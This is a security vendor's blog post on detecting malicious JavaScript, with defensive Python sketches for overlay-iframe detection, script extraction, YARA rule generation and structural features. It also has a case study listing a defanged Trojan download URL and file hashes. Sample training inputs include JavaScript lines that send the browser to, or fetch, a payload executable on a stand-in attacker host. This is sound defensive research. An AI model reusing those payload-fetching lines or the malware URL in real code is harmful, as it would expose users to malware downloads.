Detecting Malicious JavaScript with Secure Internet Access Enterprise Secure Web Gateway
Written by: Jordan Garzon
Introduction
Imagine a world without JavaScript. I can't count the number of times my colleagues and I have thought about this at some point in our careers, and as of right now, a world without JavaScript is hard to imagine. As someone who works in a company that has been dealing with JavaScript for several years now, I am well aware of its challenges, and just how prevalent it is in our industry. In fact, JavaScript protection remains a huge part of our mission, whether we like it or not.
JavaScript is everywhere. Every request to a website and mobile application loads dozens of lines of JavaScript code; every browser supports it. It’s so ubiquitous that it could easily be considered a critical technology, one that shapes the way websites are built and function. And, as we all know, in security, the more critical a technology, the more ways it can be used maliciously.
Because JavaScript is so pervasive, it gives adversaries a huge attack surface and the chance to do significant damage. The potential impact of such a widespread vector was illustrated by the Log4j vulnerability discovered in December 2021, which provided immediate scale once exploited. Log4j, a Java library, provides logging capability, a basic functionality that almost all developers use. JavaScript shares that trait, and that is what sets JavaScript threats apart from most others: its huge presence in production code.
With all this in mind, the ever-present question prevails: “So, what can we do about it?” After seeing the havoc wreaked by Log4j, we decided to try to definitively answer the question and launched an investigation to understand and detect malicious JavaScript. This led to the project I’m writing about today. Security research is always fun, and when we saw our theory worked, we took it a step further and tried out some real-world contextual situations.
In this blog post, I want to tell you about our investigation and the techniques we've used to identify and isolate malicious JavaScript in order to build a new capability in our product. It covers the JavaScript threat landscape, the system architecture, the algorithms we applied, and a case study.
Malicious JavaScript threat landscape
Before we get into the meat of the project, let’s look at the landscape that makes malicious JavaScript such a notable threat vector. I’ve already mentioned its pervasiveness, but just how deep does this go? Understanding this factor really puts the project into perspective. Outlined below are some of the most prevalent attacks using JavaScript in the wild.
Browser exploit
I don’t have to tell you how big this threat is: nearly everyone with a computer relies on a browser and its plugins. A good illustration is The Browser Exploitation Framework Project, also known as BeEF. BeEF is a penetration testing tool focused on the web browser, one of the biggest client-side attack vectors out there, and it shows quite well how exploitable browsers are.
Skimmers
Skimmers are an infamous example of how cybersecurity can reach beyond the corporate world and become very personal. Since JavaScript controls the Document Object Model, it can modify not only the generated HTML but also the underlying HTTP requests. This can be triggered by an action as simple as a user clicking a button.
A real-world example can be found on any site that handles digital commerce. If malicious JavaScript is injected into a benign website, the credit card details captured by the skimmer can be sent to the attacker. The most notable case was the 2018 Magecart attack on the British Airways website, in which approximately 380,000 credit card numbers were stolen.
Skimming has evolved since 2018. A common variant today replaces bitcoin addresses on a benign website with the attacker’s address, as we have seen with the Lazarus group in the past few years.
Clickjacking
Although operating on a benign website allows for wide dissemination, it is limited in scope compared with a server over which you maintain full control. If the attacker can make the user come to them, they’ve got home-court advantage. This allows for a significantly larger impact for the attacker. Once the victims land on their turf, the attacker can make them download malware, retrieve information from their browsing session, and perform many other malicious activities.
A classic way to do this is to create a transparent iframe on top of a legitimate one, giving the users a false sense of security when they click on it. This iframe redirects the users to the attacker-controlled server where the attackers can run their myriad malicious activities.
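As a rough illustration of the overlay trick described above, the following Python sketch flags iframes whose inline style makes them both invisible and positioned over the page. It is a simplified heuristic written for this post, not the detection logic of our engine: the class name OverlayFinder, the 0.1 opacity threshold, and the example URLs are all assumptions, and overlays built dynamically by JavaScript or styled through CSS classes would not be caught.

```python
from html.parser import HTMLParser


def parse_style(style: str) -> dict:
    """Turn an inline style string into a {property: value} dict."""
    props = {}
    for decl in style.split(";"):
        if ":" in decl:
            name, value = decl.split(":", 1)
            props[name.strip().lower()] = value.strip().lower()
    return props


class OverlayFinder(HTMLParser):
    """Collect iframes that are nearly transparent and absolutely/fixed positioned."""

    def __init__(self):
        super().__init__()
        self.suspicious = []

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        attr = dict(attrs)
        style = parse_style(attr.get("style") or "")
        try:
            opacity = float(style.get("opacity", "1"))
        except ValueError:
            opacity = 1.0  # unparsable value: treat as visible
        positioned = style.get("position") in ("absolute", "fixed")
        # Hypothetical threshold: anything below 10% opacity counts as invisible.
        if opacity < 0.1 and positioned:
            self.suspicious.append(attr.get("src"))


def find_overlay_iframes(html: str) -> list:
    """Return the src of every iframe that looks like a transparent overlay."""
    finder = OverlayFinder()
    finder.feed(html)
    finder.close()
    return finder.suspicious


page = (
    '<iframe src="https://attacker.example/x" '
    'style="opacity:0; position:absolute; top:0"></iframe>'
    '<iframe src="https://video.example/embed"></iframe>'
)
print(find_overlay_iframes(page))
```

A static check like this only covers the simplest variant of the attack; it is meant to make the mechanism concrete rather than to serve as a complete detector.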
Unauthorized cryptomining
Cryptomining has gained a lot of attention in the past few years with the sharp rise in cryptocurrency use. Why not use the user’s CPU to mine cryptocurrencies? Especially when it takes just one line of JavaScript. The most famous library for this was Coinhive, which reportedly shut down in 2019 but has since been replaced by alternatives such as CoinIMP and CryptoLOOT.
Malicious JavaScript detection engine — architecture and algorithms
Now that I have walked you through the landscape, it’s time to get to what we created. There are two ways of loading JavaScript from a file into a website: by hosting the JavaScript file on the same server, or by using an existing file from another source and inserting its link in the HTML page. Either way, on the proxy side we see two different HTTP requests, one for the HTML and one for the JavaScript file. When you visit a single website, your browser may perform hundreds of HTTP requests to render the entire page.
You can also write the JavaScript code within the HTML itself, in which case no additional request is needed to retrieve it. Detecting malicious JavaScript therefore requires a way to handle both external files and inline code, which is what we created.
Our new engine is able to extract the “inline” JavaScript code and scan it separately. Below is an extract of the source page from The New York Times showing these two types of JavaScript:
HTML code excerpt of The New York Times website (https://www.nytimes.com/) on February 2, 2022
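To make the distinction between external and inline JavaScript concrete, here is a minimal Python sketch that separates the two in an HTML page using only the standard library. It is an illustration, not the extraction code running in the SWG; the ScriptExtractor class and the example URL are made up for this post.

```python
from html.parser import HTMLParser


class ScriptExtractor(HTMLParser):
    """Split a page's scripts into external references and inline code."""

    def __init__(self):
        super().__init__()
        self.external = []   # values of <script src="...">
        self.inline = []     # code written directly inside <script>...</script>
        self._in_inline = False
        self._buffer = []

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        src = dict(attrs).get("src")
        if src:
            # External script: the browser fetches it with a separate HTTP request.
            self.external.append(src)
        else:
            # Inline script: the code arrives inside the HTML response itself.
            self._in_inline = True
            self._buffer = []

    def handle_data(self, data):
        if self._in_inline:
            self._buffer.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_inline:
            code = "".join(self._buffer).strip()
            if code:
                self.inline.append(code)
            self._in_inline = False


html = """
<html><head>
<script src="https://cdn.example/app.js"></script>
<script>var greeting = "hello";</script>
</head></html>
"""
extractor = ScriptExtractor()
extractor.feed(html)
extractor.close()
print("external:", extractor.external)
print("inline:", extractor.inline)
```

In this sketch every inline block ends up in its own list entry, so each one could be handed to a scanner separately, in the same way an external file would be.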
Akamai Secure Internet Access Enterprise secure web gateway (SWG) is composed of different engines scanning the traffic in real time. It is also connected to our threat intelligence and enriched by our custom algorithms.
Let’s zoom inside the red box labeled “JS Models”:
Database
The models rely on a relational database that keeps the metadata; the actual JavaScript code is stored with a storage vendor.
The database includes a training set, i.e., our labeled data. The benign data comes mainly from popular JavaScript seen in our traffic. The malicious data is drawn from various sources: VirusTotal (VT), detections from other algorithms, and malicious code that we detect ourselves. Thus, it is constantly updated.
The DB also contains the test set, which is basically the last few days of traffic that we see over the proxy.
Model for real-time detection
To detect malicious JavaScript in real time, we use YARA rules that we deploy on the edge. Those rules are created from the training set. Since writing rules by hand is not an easy task, we based an algorithm on this paper that automatically generates YARA rules. We adapted it to classify JavaScript code instead of binaries, and changed the rule generation logic. Because the rules are generated automatically, we can update the malicious JavaScript engine running on the SWG on demand.
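The general idea of generating signatures from labeled data can be sketched in a few lines of Python. This is a deliberately naive stand-in, not the algorithm from the paper and not our production logic: it keeps strings that appear in a large share of the malicious samples and in none of the benign ones, then prints them as YARA rule text. The function names, the token pattern, and the thresholds are all assumptions chosen for illustration.

```python
import re
from collections import Counter

# Hypothetical token definition: runs of at least 6 identifier/URL characters.
TOKEN_RE = re.compile(r"[A-Za-z0-9_./:-]{6,}")


def tokens(code: str) -> set:
    """Return the set of candidate strings found in one script."""
    return set(TOKEN_RE.findall(code))


def select_signature_strings(malicious, benign, min_support=0.5, max_strings=5):
    """Pick strings common in malicious samples and absent from benign ones."""
    benign_tokens = set()
    for code in benign:
        benign_tokens |= tokens(code)
    counts = Counter()
    for code in malicious:
        counts.update(tokens(code) - benign_tokens)
    threshold = min_support * len(malicious)
    # Sort by descending frequency, then alphabetically, to stay deterministic.
    ranked = sorted(counts.items(), key=lambda kv: (-kv[1], kv[0]))
    return [tok for tok, n in ranked if n >= threshold][:max_strings]


def render_yara_rule(name: str, strings: list) -> str:
    """Render the selected strings as the text of a simple YARA rule."""
    if not strings:
        raise ValueError("a rule needs at least one string")
    lines = [f"rule {name}", "{", "    strings:"]
    for i, s in enumerate(strings):
        escaped = s.replace("\\", "\\\\").replace('"', '\\"')
        lines.append(f'        $s{i} = "{escaped}"')
    lines += ["    condition:", "        any of them", "}"]
    return "\n".join(lines)


malicious = [
    'document.location="http://evil.example/payload.exe";',
    'var u="http://evil.example/payload.exe"; fetch(u);',
]
benign = ['document.getElementById("menu").focus();']
picked = select_signature_strings(malicious, benign, min_support=1.0)
print(render_yara_rule("js_sample_rule", picked))
```

A real generator has to weigh false positives much more carefully than this, for example by scoring strings against a large benign corpus, which is why the benign side of the training set matters as much as the malicious side.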
Threat intelligence enrichment by machine learning model
A known problem that researchers face when catching malicious JavaScript is obfuscation, a technique (also used by benign websites) that minifies the code and turns it into gibberish. Or Katz wrote a blog post about this in October 2020.
To detect obfuscated scripts, we integrated our logic into a model inspired by JStap, which operates on the abstract syntax tree (AST), a tree representation of the code. Working on the structure of the code rather than its text is how we get around this technique.
A machine learning model can provide better accuracy than YARA rules. However, deploying it on the edge for real-time scanning is challenging. So, we landed somewhere in between. Our model is trained with the same training set, scans the traffic offline (in the Azure Machine Learning environment), and feeds what it finds into the threat intelligence.
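Why structure helps against obfuscation can be shown with a small Python sketch. Note that it is a lexical simplification and not an AST: instead of parsing the code into a tree, it replaces every identifier, string, and number with its category and counts n-grams over the result. The token pattern, the keyword list, and the function names are assumptions made for this example, and the tokenizer ignores comments and regular expression literals.

```python
import re
from collections import Counter

# Small, non-exhaustive keyword list used only for this illustration.
KEYWORDS = {"var", "let", "const", "function", "return",
            "if", "else", "for", "while", "new"}

TOKEN_RE = re.compile(r"""
    (?P<String>"(?:\\.|[^"\\])*"|'(?:\\.|[^'\\])*')
  | (?P<Number>\d+(?:\.\d+)?)
  | (?P<Word>[A-Za-z_$][A-Za-z0-9_$]*)
  | (?P<Punct>[^\sA-Za-z0-9_$])
""", re.VERBOSE)


def abstract_tokens(code: str) -> list:
    """Map each token to its category, hiding concrete names and values."""
    out = []
    for match in TOKEN_RE.finditer(code):
        kind, text = match.lastgroup, match.group()
        if kind == "Word":
            out.append(text if text in KEYWORDS else "Identifier")
        elif kind == "Punct":
            out.append(text)
        else:
            out.append(kind)  # "String" or "Number"
    return out


def ngram_features(code: str, n: int = 3) -> Counter:
    """Count n-grams of abstracted tokens; usable as input to a classifier."""
    toks = abstract_tokens(code)
    return Counter(tuple(toks[i:i + n]) for i in range(len(toks) - n + 1))


readable = 'var url = "http://a.example"; go(url);'
renamed = 'var _0x1f = "http://b.example"; _0x9(_0x1f);'
print(abstract_tokens(readable))
print(ngram_features(readable) == ngram_features(renamed))
```

The two snippets differ in every name and literal, yet they produce the same features, which is the property that makes structural representations attractive when the text of the code has been scrambled.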
The threat intelligence is checked on every connection to the SWG — that way customers benefit from the machine learning model detection.
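The split between offline detection and online lookup can be pictured with the following Python sketch. It is a toy model of the flow, not our threat intelligence service: the ThreatIntel class, its method names, and the example hosts are hypothetical, and a real system would also track expiry, confidence, and more than just hostnames.

```python
from urllib.parse import urlsplit


class ThreatIntel:
    """In-memory set of hosts flagged by the offline model (illustrative only)."""

    def __init__(self):
        self._bad_hosts = set()

    def add_detection(self, url: str) -> None:
        """Called by the offline scan when a script at `url` is classified as malicious."""
        host = urlsplit(url).hostname
        if host:
            self._bad_hosts.add(host.lower())

    def is_blocked(self, url: str) -> bool:
        """Called on every connection: a cheap set lookup, no model inference."""
        host = (urlsplit(url).hostname or "").lower()
        return host in self._bad_hosts


intel = ThreatIntel()
# Offline step: the model flags a script hosted on a (made-up) domain.
intel.add_detection("https://malicious.example/js/a.js")
# Online step: later connections to the same host are matched immediately.
print(intel.is_blocked("http://malicious.example/index.html"))
print(intel.is_blocked("https://benign.example/"))
```

The expensive classification happens once, away from the request path, while the per-connection cost stays at a constant-time lookup.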
Seeing it in action — a case study
The best way to showcase this is by using a real-life example. On March 8, 2022, the machine learning model detected JavaScript hosted on cigarettesblog[.]blogspot[.]com.
This domain, as of March 10, 2022, was showing 0 detections on VT.
In the following extract, the JavaScript code replaces all the HTML links with malicious URLs.
One of them, hxxps://myprintscreen[.]com/soft/myp0912.exe, which has since been commented out in the code, downloads a Trojan (4a6ffa02ff7280e00cf722c4f2235f0e318e6cc8a2b9968639ba715f1a38c834), which has 23 detections on VT. Several other URLs were flagged as malicious by many vendors on VT.
This is a classic behavior of malicious JavaScript: replacing URLs on the pages, sending POST requests to other domains (see the extract below), or conducting a drive-by download attack for dropping malware on the user's machine.
URLs:
myprintscreen[.]com/soft/myp0912.exe
www[.]blog-hits[.]com
File hashes:
4a6ffa02ff7280e00cf722c4f2235f0e318e6cc8a2b9968639ba715f1a38c834 (Trojan)
fc311d002d7139e0a58b00464731ba8d4faea4670cff9fedfb35057fe838c285 (JavaScript file uploaded by us on March 10)
The same mechanism was also detected on penis-photo.blogspot[.]com.br (March 10), mateyhderesa[.]blogspot.com (March 13), and playboy-college-girls.blogspot[.]sk (March 14).
Summary
As I said at the beginning of this post, the more critical a technology is, the more ways it can be used maliciously, and abuse of something as prevalent as JavaScript can have major consequences. Malicious JavaScript can also be quite difficult to analyze; a previous blog post showed that 25% of the malicious code we see is obfuscated. That’s not an insignificant percentage, and considering how much of the internet we see, it is quite representative of the scale of the problem.
This research began as a way to make our customers more secure, so we took what we found and applied it to our SWG. We have two new models: YARA-based and machine learning–based. The model based on YARA rule signatures scans any JavaScript code going through the SWG for real-time protection. The model based on machine learning double-checks the traffic offline and updates the threat intelligence used at the edge. Both models are constantly updated and retrained, and take into account the latest threats as well as the new benign JavaScript seen in the wild.